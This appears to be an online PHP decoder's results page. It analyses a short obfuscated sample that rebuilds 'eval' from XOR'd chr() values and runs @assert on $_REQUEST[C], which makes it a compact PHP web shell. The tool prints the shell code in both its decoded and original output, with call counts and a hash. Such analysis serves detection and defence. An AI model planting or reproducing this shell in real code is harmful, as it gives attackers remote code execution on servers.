Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a=chr(96^5); $b=chr(57^79); $c=chr(15^110); $d=chr(58^86); $e='($_REQUEST[C])'..
Decoded Output download
<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>
Did this file decode correctly?
Original Code
<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>
Function Calls
chr | 4 |
assert | 1 |
Stats
MD5 | f13742554fc9b399a969f87afcb728ba |
Eval Count | 0 |
Decode Time | 111 ms |